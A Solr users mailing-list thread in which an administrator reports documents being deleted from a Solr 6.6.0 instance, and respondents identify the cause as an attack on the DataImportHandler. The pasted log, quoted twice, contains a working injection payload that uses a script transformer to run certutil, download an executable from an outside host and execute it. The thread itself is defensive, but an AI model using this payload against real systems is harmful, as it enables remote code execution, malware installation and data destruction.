URGENT Documents automatically getting deleted in SOLR 6.6.0

classic Classic list List threaded Threaded
3 messages Options
Reply | Threaded
Open this post in threaded view
|

URGENT Documents automatically getting deleted in SOLR 6.6.0

Neha-2
Hello SOLR Users,

Today i have noticed that in my SOLR instance 6.6.0 documents are
getting automatically deleted.

In SOLR traces i found below lines and seems it is because of this.


2019-09-26 09:01:21.599 INFO  (qtp225493257-14) [   x:Ecotron]
o.a.s.c.S.Request [xyz]  webapp=/solr path=/dataimport
params={cmd.exe+/c+C:/Windows/temp/ready.exe");%0a++++++++++}%0a++]]></script>%0a++<document>%0a++++<entity+name%3D"stackoverflow"%0a++++++++++++url%3D"https://stackoverflow.com/feeds/tag/solr"%0a++++++++++++processor%3D"XPathEntityProcessor"%0a++++++++++++forEach%3D"/feed"%0a++++++++++++transformer%3D"script:poc"+/>%0a++</document>%0a</dataConfig>=&core=atom&debug=true&indent=on&commit=true&name=dataimport&dataConfig=<dataConfig>%0a++<dataSource+type%3D"URLDataSource"/>%0a++<script><![CDATA[%0a++++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("cmd.exe+/c+certutil.exe+-urlcache+-split+-f+http://www.jukesxdbrxd.xyz/ready.exe+C:/Windows/temp/ready.exe&clean=true&wt=json&command=full-import&_=1565530241159&verbose=false}
status=500 QTime=94
2019-09-26 09:01:21.599 ERROR (qtp225493257-14) [   x:Ecotron]
o.a.s.s.HttpSolrCall
null:org.apache.solr.handler.dataimport.DataImportHandlerException: Data
Config problem: XML document structures must start and end within the
same entity.


Also the "dataimport.properties" files of each core is getting updated
with something like below: -

*stackoverflow.last_index_time=2019-09-26 08\:24\:11*


Is there some configuration which i am missing. Request you to please
help me with this as i am clueless why this is happening.

Thanks for your support!!


Regards

Neha Gupta


Reply | Threaded
Open this post in threaded view
|

Re: URGENT Documents automatically getting deleted in SOLR 6.6.0

Shawn Heisey-2
On 9/26/2019 6:42 AM, Neha wrote:
> Today i have noticed that in my SOLR instance 6.6.0 documents are
> getting automatically deleted.
>
> In SOLR traces i found below lines and seems it is because of this.
>
> 2019-09-26 09:01:21.599 INFO  (qtp225493257-14) [   x:Ecotron]
<snip>

> Also the "dataimport.properties" files of each core is getting updated
> with something like below: -
>
> *stackoverflow.last_index_time=2019-09-26 08\:24\:11*

One of the parameters of your DIH request is "clean=true".  I can see
this in the logged message that contains "o.a.s.c.S.Request".  What this
parameter means is that DIH will delete all documents in the index as
its first step.

There is an error logged, but the fact that dataimport.properties is
being updated suggests that DIH is probably honoring the clean=true
parameter, then throwing the error that says the config is not good.

Thanks,
Shawn
Reply | Threaded
Open this post in threaded view
|

Re: URGENT Documents automatically getting deleted in SOLR 6.6.0

Alexandre Rafalovitch
In reply to this post by Neha-2
Your system is under attack, something trying to hack into it via
Solr. Possibly a cryptominer or similar. And it is using DIH endpoint
for it.

Shawn explain the most likely cause for Solr actually deleting the
records. I would also suggest:
1) Figure out where the request is coming from and treat it as a
threat. If it is internal, they are infected. If they are external and
consistent, maybe they need to be blocked, etc.
2) Check your system has not been infected already by looking for
weird processes. I guess if you are not on Windows, that particular
line is not a threat, but the attack may have had several methods
3) If you are not using dataimporthandler, remove that from the
solrconfig.xml. Or rename (though that will loose Admin UI interface).
Or firewall block access to it....

Regards,
   Alex.

On Thu, 26 Sep 2019 at 08:42, Neha <[hidden email]> wrote:

>
> Hello SOLR Users,
>
> Today i have noticed that in my SOLR instance 6.6.0 documents are
> getting automatically deleted.
>
> In SOLR traces i found below lines and seems it is because of this.
>
>
> 2019-09-26 09:01:21.599 INFO  (qtp225493257-14) [   x:Ecotron]
> o.a.s.c.S.Request [xyz]  webapp=/solr path=/dataimport
> params={cmd.exe+/c+C:/Windows/temp/ready.exe");%0a++++++++++}%0a++]]></script>%0a++<document>%0a++++<entity+name%3D"stackoverflow"%0a++++++++++++url%3D"https://stackoverflow.com/feeds/tag/solr"%0a++++++++++++processor%3D"XPathEntityProcessor"%0a++++++++++++forEach%3D"/feed"%0a++++++++++++transformer%3D"script:poc"+/>%0a++</document>%0a</dataConfig>=&core=atom&debug=true&indent=on&commit=true&name=dataimport&dataConfig=<dataConfig>%0a++<dataSource+type%3D"URLDataSource"/>%0a++<script><![CDATA[%0a++++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("cmd.exe+/c+certutil.exe+-urlcache+-split+-f+http://www.jukesxdbrxd.xyz/ready.exe+C:/Windows/temp/ready.exe&clean=true&wt=json&command=full-import&_=1565530241159&verbose=false}
> status=500 QTime=94
> 2019-09-26 09:01:21.599 ERROR (qtp225493257-14) [   x:Ecotron]
> o.a.s.s.HttpSolrCall
> null:org.apache.solr.handler.dataimport.DataImportHandlerException: Data
> Config problem: XML document structures must start and end within the
> same entity.
>
>
> Also the "dataimport.properties" files of each core is getting updated
> with something like below: -
>
> *stackoverflow.last_index_time=2019-09-26 08\:24\:11*
>
>
> Is there some configuration which i am missing. Request you to please
> help me with this as i am clueless why this is happening.
>
> Thanks for your support!!
>
>
> Regards
>
> Neha Gupta
>
>